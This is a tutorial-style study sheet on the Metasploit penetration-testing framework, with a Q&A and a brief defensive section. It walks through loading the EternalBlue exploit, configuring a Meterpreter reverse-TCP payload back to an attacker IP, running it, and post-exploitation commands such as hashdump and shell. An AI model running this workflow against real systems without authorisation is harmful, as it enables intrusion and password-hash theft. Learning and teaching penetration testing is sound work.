Metasploit
- A powerful exploitation framework used to develop, test, and execute exploits against vulnerable systems.

Stage in Attack Lifecycle:
Recon → Initial Access → **Exploitation** → Post-Exploitation


==================================================
1. Overview
==================================================
- Metasploit is one of the most widely used penetration testing frameworks.
- It provides a modular platform for exploiting vulnerabilities, delivering payloads, and performing post-exploitation activities.

Metasploit contains thousands of modules including:

- Exploits
- Payloads
- Auxiliary scanners
- Post-exploitation tools
- Encoders
- Evasion modules

The main interface is the Metasploit console (msfconsole).


==================================================
2. Starting Metasploit
==================================================

Start the framework:

msfconsole

After loading, you will see the Metasploit prompt:

msf6 >


==================================================
3. Searching for Modules
==================================================
- Search for exploits or modules related to a vulnerability.

Example:

search smb

Example:

search type:exploit windows smb


==================================================
4. Selecting a Module
==================================================
- Load an exploit module using the use command.

Example:

use exploit/windows/smb/ms17_010_eternalblue

This loads the EternalBlue exploit module.


==================================================
5. Viewing Module Options
==================================================
Display configuration options:

show options

Common options include:

RHOSTS
Target host

RPORT
Target port

LHOST
Local attacker IP

LPORT
Local listener port


==================================================
6. Setting Options
==================================================
Set required parameters before launching the exploit.

Example:

set RHOSTS 192.168.1.50
set LHOST 192.168.1.10


==================================================
7. Choosing a Payload
==================================================
- Payloads define what happens after exploitation.

Example:

set payload windows/meterpreter/reverse_tcp


Common payload types:

reverse shell
bind shell
meterpreter


==================================================
8. Running the Exploit
==================================================

Launch the exploit:

run

or

exploit


If successful, a session will open.


==================================================
9. Meterpreter Sessions
==================================================
- Meterpreter is an advanced post-exploitation payload.

Example commands:

sysinfo
Display system information

getuid
Display current user

shell
Drop into system shell

hashdump
Dump password hashes

screenshot
Capture screen


==================================================
10. Backgrounding Sessions
==================================================

Press:

Ctrl + Z

Then list sessions:

sessions

Interact with a session:

sessions -i 1


==================================================
11. Auxiliary Modules
==================================================
- Auxiliary modules perform scanning or enumeration tasks.

Example:

use auxiliary/scanner/portscan/tcp

Example scan:

set RHOSTS 192.168.1.0/24
run


==================================================
12. Example Exploitation Workflow
==================================================

Nmap Scan
        ↓
Vulnerable Service Identified
        ↓
Metasploit Exploit Module Selected
        ↓
Payload Configured
        ↓
Exploit Executed
        ↓
Meterpreter Session Obtained
        ↓
Post-Exploitation Activities


==================================================
13. Useful Metasploit Commands
==================================================

help
Display help menu

search
Search modules

use
Load module

show options
Display configuration

set
Configure parameter

run
Execute module

sessions
List active sessions

sessions -i
Interact with session


==================================================
14. Operational Notes
==================================================
Metasploit activity may trigger:

- Intrusion detection alerts
- Endpoint detection systems
- Exploit signatures

Many defenders monitor for:

- Meterpreter traffic
- exploit behavior
- suspicious payloads


==================================================
15. Defensive Considerations
==================================================
Organizations can reduce exploitation risk by:

- Applying security patches
- Hardening network services
- Monitoring exploit attempts
- Implementing intrusion detection systems
- Limiting exposed services


==================================================
16. Questions & Answers
==================================================

1. Question:
What is Metasploit?

Answer:
Metasploit is an exploitation framework used to test and exploit vulnerabilities.

--------------------------------------------------

2. Question:
What is an exploit module?

Answer:
A piece of code designed to take advantage of a vulnerability.

--------------------------------------------------

3. Question:
What is a payload?

Answer:
The code executed on the target system after exploitation.

--------------------------------------------------

4. Question:
What is Meterpreter?

Answer:
An advanced payload used for post-exploitation tasks.

--------------------------------------------------

5. Question:
What command starts Metasploit?

Answer:
msfconsole

--------------------------------------------------

6. Question (Attack Perspective):
Why is Metasploit widely used by penetration testers?

Answer:
Because it provides ready-to-use exploits, payloads, and post-exploitation tools.

--------------------------------------------------

7. Question (Defensive Perspective):
How can organizations defend against Metasploit attacks?

Answer:
By patching vulnerabilities, monitoring exploit attempts, and restricting exposed services.